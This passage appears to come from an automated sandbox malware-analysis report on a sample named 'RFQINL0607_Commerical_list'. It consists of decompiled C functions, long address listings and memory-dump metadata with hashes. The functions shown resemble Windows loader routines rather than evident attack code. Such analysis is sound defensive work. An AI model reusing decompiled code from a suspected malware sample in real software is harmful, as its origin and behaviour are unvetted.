														E333943A0();
														_t159 = L33353722(_v36);
													}
												}
												return _t159;
											} else {
												_t174 =  *(_t242 + 4);
												if( *_t174 != _t242) {
													goto L44;
												} else {
													 *_t174 = _t198;
													 *(_t198 + 4) = _t174;
													_push( *((intOrPtr*)(_t242 + 8)));
													E33392A80();
													_t176 =  *0x33446644; // 0x0
													E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t176 + 0xc0000, _t242);
													continue;
												}
											}
											goto L58;
										}
										 *(_t222 + 0x24) =  *(_t222 + 0x24) & 0xff800001;
										goto L39;
									}
								} else {
									 *(_t222 + 0x24) = _t238 & 0xfffff001;
									goto L39;
								}
							}
						}
					} else {
						_push(_v28);
						L40:
						E333552F0(_t198);
						L41:
						_t109 = _v16;
						continue;
					}
					L58:
				}
				return E333624D0(0x33446884);
				goto L58;
			}































































                                                                                                                                                                                  0x33424080
                                                                                                                                                                                  0x3342408b
                                                                                                                                                                                  0x33424098
                                                                                                                                                                                  0x334240a0
                                                                                                                                                                                  0x334240a5
                                                                                                                                                                                  0x334243e6
                                                                                                                                                                                  0x334240af
                                                                                                                                                                                  0x334240b3
                                                                                                                                                                                  0x334240bb
                                                                                                                                                                                  0x334240bf
                                                                                                                                                                                  0x334240c8
                                                                                                                                                                                  0x334240db
                                                                                                                                                                                  0x334240df
                                                                                                                                                                                  0x334240e4
                                                                                                                                                                                  0x334240ed
                                                                                                                                                                                  0x334240ef
                                                                                                                                                                                  0x334240f0
                                                                                                                                                                                  0x334240f2
                                                                                                                                                                                  0x334240f8
                                                                                                                                                                                  0x33424104
                                                                                                                                                                                  0x334243d0
                                                                                                                                                                                  0x334243d4
                                                                                                                                                                                  0x334243d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342410a
                                                                                                                                                                                  0x3342410a
                                                                                                                                                                                  0x33424110
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424116
                                                                                                                                                                                  0x33424120
                                                                                                                                                                                  0x33424124
                                                                                                                                                                                  0x33424129
                                                                                                                                                                                  0x33424131
                                                                                                                                                                                  0x33424137
                                                                                                                                                                                  0x33424139
                                                                                                                                                                                  0x33424153
                                                                                                                                                                                  0x33424158
                                                                                                                                                                                  0x3342415b
                                                                                                                                                                                  0x3342416b
                                                                                                                                                                                  0x3342416f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342416f
                                                                                                                                                                                  0x33424139
                                                                                                                                                                                  0x33424171
                                                                                                                                                                                  0x33424177
                                                                                                                                                                                  0x33424187
                                                                                                                                                                                  0x334241ab
                                                                                                                                                                                  0x334241b0
                                                                                                                                                                                  0x334241b4
                                                                                                                                                                                  0x334241b9
                                                                                                                                                                                  0x3342420f
                                                                                                                                                                                  0x33424223
                                                                                                                                                                                  0x33424234
                                                                                                                                                                                  0x33424239
                                                                                                                                                                                  0x3342423f
                                                                                                                                                                                  0x33424296
                                                                                                                                                                                  0x3342429a
                                                                                                                                                                                  0x3342429c
                                                                                                                                                                                  0x334242a0
                                                                                                                                                                                  0x334242a0
                                                                                                                                                                                  0x334242a4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334242ad
                                                                                                                                                                                  0x334242b0
                                                                                                                                                                                  0x334242b3
                                                                                                                                                                                  0x334242b5
                                                                                                                                                                                  0x334242b7
                                                                                                                                                                                  0x334242be
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334242c4
                                                                                                                                                                                  0x334242c4
                                                                                                                                                                                  0x334242c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334242cf
                                                                                                                                                                                  0x334242cf
                                                                                                                                                                                  0x334242d3
                                                                                                                                                                                  0x334242d4
                                                                                                                                                                                  0x334242d6
                                                                                                                                                                                  0x334242d9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334242d9
                                                                                                                                                                                  0x334242c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334242be
                                                                                                                                                                                  0x334242de
                                                                                                                                                                                  0x334242ec
                                                                                                                                                                                  0x334242f5
                                                                                                                                                                                  0x334242fa
                                                                                                                                                                                  0x33424301
                                                                                                                                                                                  0x33424308
                                                                                                                                                                                  0x3342430a
                                                                                                                                                                                  0x3342430f
                                                                                                                                                                                  0x33424313
                                                                                                                                                                                  0x33424317
                                                                                                                                                                                  0x3342431c
                                                                                                                                                                                  0x33424325
                                                                                                                                                                                  0x3342431e
                                                                                                                                                                                  0x33424320
                                                                                                                                                                                  0x33424320
                                                                                                                                                                                  0x33424328
                                                                                                                                                                                  0x3342432c
                                                                                                                                                                                  0x3342432d
                                                                                                                                                                                  0x3342432f
                                                                                                                                                                                  0x33424331
                                                                                                                                                                                  0x33424332
                                                                                                                                                                                  0x3342433d
                                                                                                                                                                                  0x33424343
                                                                                                                                                                                  0x33424346
                                                                                                                                                                                  0x33424347
                                                                                                                                                                                  0x3342434d
                                                                                                                                                                                  0x33424355
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424355
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342433d
                                                                                                                                                                                  0x33424359
                                                                                                                                                                                  0x3342435b
                                                                                                                                                                                  0x3342435f
                                                                                                                                                                                  0x33424363
                                                                                                                                                                                  0x33424363
                                                                                                                                                                                  0x33424366
                                                                                                                                                                                  0x3342436d
                                                                                                                                                                                  0x33424381
                                                                                                                                                                                  0x33424386
                                                                                                                                                                                  0x33424389
                                                                                                                                                                                  0x33424389
                                                                                                                                                                                  0x33424363
                                                                                                                                                                                  0x3342438e
                                                                                                                                                                                  0x334243a7
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424241
                                                                                                                                                                                  0x33424241
                                                                                                                                                                                  0x33424241
                                                                                                                                                                                  0x33424245
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424247
                                                                                                                                                                                  0x3342424c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424252
                                                                                                                                                                                  0x33424252
                                                                                                                                                                                  0x33424257
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342425d
                                                                                                                                                                                  0x3342425d
                                                                                                                                                                                  0x3342425f
                                                                                                                                                                                  0x33424262
                                                                                                                                                                                  0x33424265
                                                                                                                                                                                  0x3342426a
                                                                                                                                                                                  0x3342427f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342427f
                                                                                                                                                                                  0x33424257
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342424c
                                                                                                                                                                                  0x33424286
                                                                                                                                                                                  0x334243ac
                                                                                                                                                                                  0x334243b0
                                                                                                                                                                                  0x334243c4
                                                                                                                                                                                  0x334243ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334243ce
                                                                                                                                                                                  0x334241bb
                                                                                                                                                                                  0x334241bb
                                                                                                                                                                                  0x334241bb
                                                                                                                                                                                  0x334241bf
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334241c1
                                                                                                                                                                                  0x334241c6
                                                                                                                                                                                  0x33424402
                                                                                                                                                                                  0x33424404
                                                                                                                                                                                  0x33424405
                                                                                                                                                                                  0x3342440f
                                                                                                                                                                                  0x33424411
                                                                                                                                                                                  0x33424414
                                                                                                                                                                                  0x33424417
                                                                                                                                                                                  0x33424426
                                                                                                                                                                                  0x33424426
                                                                                                                                                                                  0x3342442c
                                                                                                                                                                                  0x33424419
                                                                                                                                                                                  0x33424419
                                                                                                                                                                                  0x3342441f
                                                                                                                                                                                  0x33424424
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424424
                                                                                                                                                                                  0x3342442f
                                                                                                                                                                                  0x33424437
                                                                                                                                                                                  0x3342443b
                                                                                                                                                                                  0x33424441
                                                                                                                                                                                  0x33424443
                                                                                                                                                                                  0x33424446
                                                                                                                                                                                  0x33424448
                                                                                                                                                                                  0x3342444d
                                                                                                                                                                                  0x33424450
                                                                                                                                                                                  0x33424451
                                                                                                                                                                                  0x33424452
                                                                                                                                                                                  0x33424454
                                                                                                                                                                                  0x33424457
                                                                                                                                                                                  0x3342445a
                                                                                                                                                                                  0x3342445a
                                                                                                                                                                                  0x3342445c
                                                                                                                                                                                  0x33424461
                                                                                                                                                                                  0x33424474
                                                                                                                                                                                  0x3342447b
                                                                                                                                                                                  0x3342447d
                                                                                                                                                                                  0x3342447f
                                                                                                                                                                                  0x33424482
                                                                                                                                                                                  0x3342448b
                                                                                                                                                                                  0x33424491
                                                                                                                                                                                  0x33424498
                                                                                                                                                                                  0x33424493
                                                                                                                                                                                  0x33424493
                                                                                                                                                                                  0x33424493
                                                                                                                                                                                  0x33424499
                                                                                                                                                                                  0x3342449f
                                                                                                                                                                                  0x334244a1
                                                                                                                                                                                  0x334244a2
                                                                                                                                                                                  0x334244a4
                                                                                                                                                                                  0x334244a4
                                                                                                                                                                                  0x334244a7
                                                                                                                                                                                  0x334244aa
                                                                                                                                                                                  0x334244b1
                                                                                                                                                                                  0x334244b7
                                                                                                                                                                                  0x33424446
                                                                                                                                                                                  0x334244ba
                                                                                                                                                                                  0x334241cc
                                                                                                                                                                                  0x334241cc
                                                                                                                                                                                  0x334241d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334241d7
                                                                                                                                                                                  0x334241d7
                                                                                                                                                                                  0x334241d9
                                                                                                                                                                                  0x334241dc
                                                                                                                                                                                  0x334241df
                                                                                                                                                                                  0x334241e4
                                                                                                                                                                                  0x334241f9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334241f9
                                                                                                                                                                                  0x334241d1
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334241c6
                                                                                                                                                                                  0x33424200
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x33424200
                                                                                                                                                                                  0x33424179
                                                                                                                                                                                  0x3342417f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3342417f
                                                                                                                                                                                  0x33424177
                                                                                                                                                                                  0x33424110
                                                                                                                                                                                  0x334240ca
                                                                                                                                                                                  0x334240ce
                                                                                                                                                                                  0x334243dd
                                                                                                                                                                                  0x334243dd
                                                                                                                                                                                  0x334243e2
                                                                                                                                                                                  0x334243e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334243e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x334240c8
                                                                                                                                                                                  0x33424401
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 4f2d7672acd44c72a69c5b75e15cb2b514b81ba141bfcb413c889f94c2b54810
                                                                                                                                                                                  • Instruction ID: 37ec3bc41b0c6a4fc7ca5f0780d01aa06e6334c50e283a6b60e4e2a37f039f0b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4f2d7672acd44c72a69c5b75e15cb2b514b81ba141bfcb413c889f94c2b54810
                                                                                                                                                                                  • Instruction Fuzzy Hash: CCA189B2A04701EFE311CF14D980B5ABBE9FF48748F454528E985EBB61C734E891CB99
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3336E310 Relevance: .3, Instructions: 261COMMONCrypto
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                                  			E3336E310(signed short* __ecx, signed int __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed short _v24;
				short _v26;
				char _v28;
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t72;
				signed short _t83;
				intOrPtr _t87;
				signed short _t100;
				signed short _t110;
				signed short _t117;
				signed int _t121;
				signed int* _t122;
				unsigned int _t124;
				intOrPtr _t129;
				intOrPtr _t135;
				signed int _t136;
				signed short _t139;
				signed short _t142;
				signed short _t149;
				signed short _t155;
				signed short* _t158;
				intOrPtr _t160;
				signed int _t161;
				signed int _t163;

				_v20 = __edx;
				_t65 = __ecx;
				_v12 = __ecx;
				_v8 = 0;
				if((__edx & 0x00000020) == 0) {
					__eflags = __edx & 0x00000200;
					if((__edx & 0x00000200) == 0) {
						return 0xc0000225;
					} else {
						_t122 = _a8;
						_t159 = E3336F380(0, __ecx, __edx, _t122,  &_v8);
						goto L17;
					}
				} else {
					if(__ecx == 0) {
						_t135 =  *4;
						_t161 =  *0 & 0x0000ffff;
						_t36 = _t135 - 2; // 0x2
						_t149 = _t36 + _t161;
						__eflags = _t149 - _t135;
						if(_t149 > _t135) {
							while(1) {
								_t121 =  *_t149 & 0x0000ffff;
								__eflags = _t121 - 0x5c;
								if(_t121 == 0x5c) {
									break;
								}
								__eflags = _t121 - 0x2f;
								if(_t121 == 0x2f) {
									break;
								} else {
									_t149 = _t149 - 2;
									__eflags = _t149 - _t135;
									if(_t149 > _t135) {
										continue;
									} else {
									}
								}
								goto L43;
							}
							_t149 = _t149 + 2;
							__eflags = _t149;
						}
						L43:
						_v24 = _t149;
						_t136 = _t149 -  *4 & 0x0000ffff;
						_v28 = _t161 - _t136;
						_v26 =  *2 - _t136;
						_t65 =  &_v28;
						_v12 = _t65;
					}
					_t163 = 0;
					if(_t65 == 0) {
						L47:
						_t163 = 0x80000000;
					} else {
						_t124 = ( *_t65 & 0x0000ffff) >> 1;
						_t158 =  *(_t65 + 4);
						if(_t124 != 0) {
							do {
								_t110 =  *_t158 & 0x0000ffff;
								_t158 =  &(_t158[1]);
								_t124 = _t124 - 1;
								_v16 = _t110;
								if(_t110 >= 0x61) {
									if(_t110 > 0x7a) {
										_t139 =  *0x33446914; // 0x7ffd0654
										__eflags = _t139;
										if(_t139 != 0) {
											__eflags = _t110 - 0xc0;
											if(_t110 >= 0xc0) {
												_t153 = _t110 & 0x0000ffff;
												_t117 =  *0x33446914; // 0x7ffd0654
												_t142 =  *0x33446914; // 0x7ffd0654
												_t110 =  *((intOrPtr*)(_t142 + (( *(_t117 + (( *(_t139 + ((_t110 & 0x0000ffff) >> 8) * 2) & 0x0000ffff) + (_t153 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t153 & 0x0000000f)) * 2)) + _v16;
											}
										}
									} else {
										_t110 = _t110 + 0xffffffe0;
									}
								}
								_t65 = _t110 & 0xffff;
								_t163 = _t163 * 0x1003f + (_t110 & 0xffff);
							} while (_t124 != 0);
						}
						if(_t163 == 0) {
							goto L47;
						}
					}
					L33362330(_t65, 0x33446668);
					_t122 = _a8;
					_t157 = _v12;
					_t159 = E3336DF70(_v12, 0, _v20, _t122, _t163);
					if(_t159 >= 0) {
						_v8 =  *((intOrPtr*)( *((intOrPtr*)( *_t122 + 0x50)) + 0x20));
					}
					E333624D0(0x33446668);
					if(_t159 < 0) {
						_v12 = 0;
					} else {
						_v12 = 1;
					}
					if(L33363C40() != 0) {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t67 = 0x7ffe0384;
					}
					if( *_t67 != 0) {
						_t67 =  *[fs:0x30];
						__eflags =  *(_t67 + 0x240) & 0x00000004;
						if(( *(_t67 + 0x240) & 0x00000004) != 0) {
							_t100 = L33363C40();
							__eflags = _t100;
							if(_t100 == 0) {
								_t67 = 0x7ffe0385;
							} else {
								_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t67 & 0x00000020;
							if(( *_t67 & 0x00000020) != 0) {
								__eflags = _v12;
								_t67 = E333D0227(0x14a0, 0, 0, (_t67 & 0xffffff00 | _v12 != 0x00000000) - 0x00000001 & 3, _t157, 0);
							}
						}
					}
				}
				L17:
				if(_t159 >= 0) {
					_t155 = 0xc0000225;
					if(_v8 != 9) {
						L34:
						E3336D3E1(_t122,  *_t122, _t159);
						 *_t122 = 0;
						goto L25;
					} else {
						_t159 =  *_t122;
						_t155 = 0;
						L33362330(_t67, 0x33446668);
						_t129 =  *((intOrPtr*)( *_t122 + 0x50));
						_t72 =  *((intOrPtr*)(_t129 + 0xc));
						if(_t72 != 0xffffffff) {
							if(_t72 == 0) {
								_t87 =  *[fs:0x18];
								__eflags =  *(_t87 + 0xfca) & 0x00001000;
								if(( *(_t87 + 0xfca) & 0x00001000) == 0) {
									_t155 = 0xc0000135;
								} else {
									 *((intOrPtr*)(_t129 + 0x10)) =  *((intOrPtr*)(_t129 + 0x10)) + 1;
								}
							} else {
								 *((intOrPtr*)(_t129 + 0xc)) = _t72 + 1;
							}
						}
						E333624D0(0x33446668);
						if(_t155 < 0) {
							goto L34;
						}
						_t160 = _a4;
						_t74 =  *_t122;
						_v20 =  *_t122;
						_v16 = 0;
						if(_t160 != 0) {
							L33362330(_t74, 0x33446668);
							__eflags =  *( *((intOrPtr*)(_t160 + 0x50)) + 0xc);
							if(__eflags == 0) {
								__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
								if(__eflags != 0) {
									goto L28;
								}
								_t155 = 0xc0000135;
								L29:
								E333624D0(0x33446668);
								goto L24;
							}
							L28:
							E3336F143(_t160, _v20, __eflags, 0,  &_v16);
							_t155 = _v16;
							goto L29;
						}
						L24:
						if(_t155 < 0) {
							_t83 =  *( *[fs:0x18] + 0xfca) & 0x00001000;
							__eflags = _t83;
							_t159 = _t83 & 0x0000ffff;
							if(_t83 == 0) {
								__eflags = 0;
								E333719DF(0);
							}
							E333796C7( *_t122, 0);
							__eflags = _t159;
							if(__eflags == 0) {
								E333879F9(__eflags);
							}
							__eflags = _t155;
							if(_t155 >= 0) {
								goto L25;
							} else {
								goto L34;
							}
						}
						L25:
						return _t155;
					}
				}
				return _t159;
				goto L65;
			}

































                                                                                                                                                                                  0x3336e318
                                                                                                                                                                                  0x3336e31b
                                                                                                                                                                                  0x3336e31d
                                                                                                                                                                                  0x3336e320
                                                                                                                                                                                  0x3336e32d
                                                                                                                                                                                  0x3336e48b
                                                                                                                                                                                  0x3336e491
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e497
                                                                                                                                                                                  0x3336e497
                                                                                                                                                                                  0x3336e4a9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e4a9
                                                                                                                                                                                  0x3336e333
                                                                                                                                                                                  0x3336e335
                                                                                                                                                                                  0x333b96d0
                                                                                                                                                                                  0x333b96d6
                                                                                                                                                                                  0x333b96df
                                                                                                                                                                                  0x333b96e2
                                                                                                                                                                                  0x333b96e4
                                                                                                                                                                                  0x333b96e6
                                                                                                                                                                                  0x333b96e8
                                                                                                                                                                                  0x333b96e8
                                                                                                                                                                                  0x333b96eb
                                                                                                                                                                                  0x333b96ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b96f0
                                                                                                                                                                                  0x333b96f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b96f5
                                                                                                                                                                                  0x333b96f5
                                                                                                                                                                                  0x333b96f8
                                                                                                                                                                                  0x333b96fa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b96fc
                                                                                                                                                                                  0x333b96fa
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b96f3
                                                                                                                                                                                  0x333b96fe
                                                                                                                                                                                  0x333b96fe
                                                                                                                                                                                  0x333b96fe
                                                                                                                                                                                  0x333b9701
                                                                                                                                                                                  0x333b9704
                                                                                                                                                                                  0x333b970e
                                                                                                                                                                                  0x333b971c
                                                                                                                                                                                  0x333b9720
                                                                                                                                                                                  0x333b9724
                                                                                                                                                                                  0x333b9727
                                                                                                                                                                                  0x333b9727
                                                                                                                                                                                  0x3336e33b
                                                                                                                                                                                  0x3336e33f
                                                                                                                                                                                  0x333b9782
                                                                                                                                                                                  0x333b9782
                                                                                                                                                                                  0x3336e345
                                                                                                                                                                                  0x3336e348
                                                                                                                                                                                  0x3336e34a
                                                                                                                                                                                  0x3336e34d
                                                                                                                                                                                  0x3336e350
                                                                                                                                                                                  0x3336e350
                                                                                                                                                                                  0x3336e353
                                                                                                                                                                                  0x3336e356
                                                                                                                                                                                  0x3336e357
                                                                                                                                                                                  0x3336e35d
                                                                                                                                                                                  0x3336e362
                                                                                                                                                                                  0x333b972f
                                                                                                                                                                                  0x333b9735
                                                                                                                                                                                  0x333b9737
                                                                                                                                                                                  0x333b9742
                                                                                                                                                                                  0x333b9745
                                                                                                                                                                                  0x333b974b
                                                                                                                                                                                  0x333b9764
                                                                                                                                                                                  0x333b976d
                                                                                                                                                                                  0x333b9779
                                                                                                                                                                                  0x333b9779
                                                                                                                                                                                  0x333b9745
                                                                                                                                                                                  0x3336e368
                                                                                                                                                                                  0x3336e368
                                                                                                                                                                                  0x3336e368
                                                                                                                                                                                  0x3336e362
                                                                                                                                                                                  0x3336e374
                                                                                                                                                                                  0x3336e377
                                                                                                                                                                                  0x3336e379
                                                                                                                                                                                  0x3336e350
                                                                                                                                                                                  0x3336e37f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e37f
                                                                                                                                                                                  0x3336e38a
                                                                                                                                                                                  0x3336e38f
                                                                                                                                                                                  0x3336e394
                                                                                                                                                                                  0x3336e3a3
                                                                                                                                                                                  0x3336e3a7
                                                                                                                                                                                  0x3336e3b1
                                                                                                                                                                                  0x3336e3b1
                                                                                                                                                                                  0x3336e3b9
                                                                                                                                                                                  0x3336e3c0
                                                                                                                                                                                  0x3336e4bb
                                                                                                                                                                                  0x3336e3c6
                                                                                                                                                                                  0x3336e3c6
                                                                                                                                                                                  0x3336e3c6
                                                                                                                                                                                  0x3336e3d4
                                                                                                                                                                                  0x333b9795
                                                                                                                                                                                  0x3336e3da
                                                                                                                                                                                  0x3336e3da
                                                                                                                                                                                  0x3336e3da
                                                                                                                                                                                  0x3336e3e2
                                                                                                                                                                                  0x333b979f
                                                                                                                                                                                  0x333b97a5
                                                                                                                                                                                  0x333b97ac
                                                                                                                                                                                  0x333b97b2
                                                                                                                                                                                  0x333b97b7
                                                                                                                                                                                  0x333b97b9
                                                                                                                                                                                  0x333b97cb
                                                                                                                                                                                  0x333b97bb
                                                                                                                                                                                  0x333b97c4
                                                                                                                                                                                  0x333b97c4
                                                                                                                                                                                  0x333b97d0
                                                                                                                                                                                  0x333b97d3
                                                                                                                                                                                  0x333b97d9
                                                                                                                                                                                  0x333b97f4
                                                                                                                                                                                  0x333b97f4
                                                                                                                                                                                  0x333b97d3
                                                                                                                                                                                  0x333b97ac
                                                                                                                                                                                  0x3336e3e2
                                                                                                                                                                                  0x3336e3e8
                                                                                                                                                                                  0x3336e3ea
                                                                                                                                                                                  0x3336e3f4
                                                                                                                                                                                  0x3336e3f9
                                                                                                                                                                                  0x3336e4c7
                                                                                                                                                                                  0x3336e4c9
                                                                                                                                                                                  0x3336e4ce
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e3ff
                                                                                                                                                                                  0x3336e3ff
                                                                                                                                                                                  0x3336e401
                                                                                                                                                                                  0x3336e408
                                                                                                                                                                                  0x3336e40d
                                                                                                                                                                                  0x3336e410
                                                                                                                                                                                  0x3336e416
                                                                                                                                                                                  0x3336e41a
                                                                                                                                                                                  0x333b97fe
                                                                                                                                                                                  0x333b9809
                                                                                                                                                                                  0x333b9810
                                                                                                                                                                                  0x333b981a
                                                                                                                                                                                  0x333b9812
                                                                                                                                                                                  0x333b9812
                                                                                                                                                                                  0x333b9812
                                                                                                                                                                                  0x3336e420
                                                                                                                                                                                  0x3336e421
                                                                                                                                                                                  0x3336e421
                                                                                                                                                                                  0x3336e41a
                                                                                                                                                                                  0x3336e429
                                                                                                                                                                                  0x3336e430
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e436
                                                                                                                                                                                  0x3336e43b
                                                                                                                                                                                  0x3336e43d
                                                                                                                                                                                  0x3336e440
                                                                                                                                                                                  0x3336e445
                                                                                                                                                                                  0x3336e45f
                                                                                                                                                                                  0x3336e467
                                                                                                                                                                                  0x3336e46a
                                                                                                                                                                                  0x3336e4e4
                                                                                                                                                                                  0x3336e4eb
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e4f1
                                                                                                                                                                                  0x3336e47f
                                                                                                                                                                                  0x3336e484
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e484
                                                                                                                                                                                  0x3336e46c
                                                                                                                                                                                  0x3336e477
                                                                                                                                                                                  0x3336e47c
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e47c
                                                                                                                                                                                  0x3336e447
                                                                                                                                                                                  0x3336e449
                                                                                                                                                                                  0x333b9836
                                                                                                                                                                                  0x333b9836
                                                                                                                                                                                  0x333b9839
                                                                                                                                                                                  0x333b983c
                                                                                                                                                                                  0x333b983e
                                                                                                                                                                                  0x333b9840
                                                                                                                                                                                  0x333b9840
                                                                                                                                                                                  0x333b9849
                                                                                                                                                                                  0x333b984e
                                                                                                                                                                                  0x333b9851
                                                                                                                                                                                  0x333b9853
                                                                                                                                                                                  0x333b9853
                                                                                                                                                                                  0x333b9858
                                                                                                                                                                                  0x333b985a
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9860
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333b9860
                                                                                                                                                                                  0x333b985a
                                                                                                                                                                                  0x3336e44f
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x3336e44f
                                                                                                                                                                                  0x3336e3f9
                                                                                                                                                                                  0x3336e4b8
                                                                                                                                                                                  0x00000000

                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8042a7d257cb242eb4ee3382794e64ce1e9482fe69c40551f0a59e4b8acfa469
                                                                                                                                                                                  • Instruction ID: ee17b0840f224b484f4741adf19594afae8bf869f49ab6598c5b8528b89b5e84
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8042a7d257cb242eb4ee3382794e64ce1e9482fe69c40551f0a59e4b8acfa469
                                                                                                                                                                                  • Instruction Fuzzy Hash: 85913475E027148FEB018F68C9C0B6A77F5EF84758F19C065E844DB6A8DB38C946CBA1
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333593A6 Relevance: .3, Instructions: 259COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                                                                  			E333593A6(void* __ebx, signed short* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t112;
				signed int _t116;
				signed int _t120;
				signed int _t121;
				signed int _t132;
				signed int _t133;
				signed int _t135;
				signed int _t137;
				signed int _t141;
				signed int _t142;
				intOrPtr _t146;
				signed int _t150;
				signed int _t152;
				signed int _t154;
				signed char _t163;
				signed int _t164;
				signed int* _t165;
				void* _t169;
				signed int _t173;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				void* _t184;
				signed int _t188;
				signed int _t191;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t207;

				_t166 = __ecx;
				_push(0x20);
				_push(0x3342bec0);
				E333A7BE4(__ebx, __edi, __esi);
				 *(_t198 - 0x1c) = __edx;
				 *(_t198 - 0x24) = __ecx;
				if(__ecx == 0) {
					L23:
					_t112 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t198 - 0x10));
					return _t112;
				}
				_t163 =  *(_t198 + 0x14);
				if((_t163 & 0xffffffcc) != 0 || (_t163 & 0x00000003) == 3) {
					goto L23;
				} else {
					_t116 = _t163 & 0x00000001;
					 *(_t198 - 0x28) = _t116;
					if(_t116 != 0) {
						__eflags = __edx;
						if(__edx != 0) {
							goto L4;
						} else {
							goto L23;
						}
					}
					L4:
					L33362330(_t116, 0x334467e8);
					_t191 = 0;
					 *((intOrPtr*)(_t198 - 4)) = 0;
					_t194 = 0;
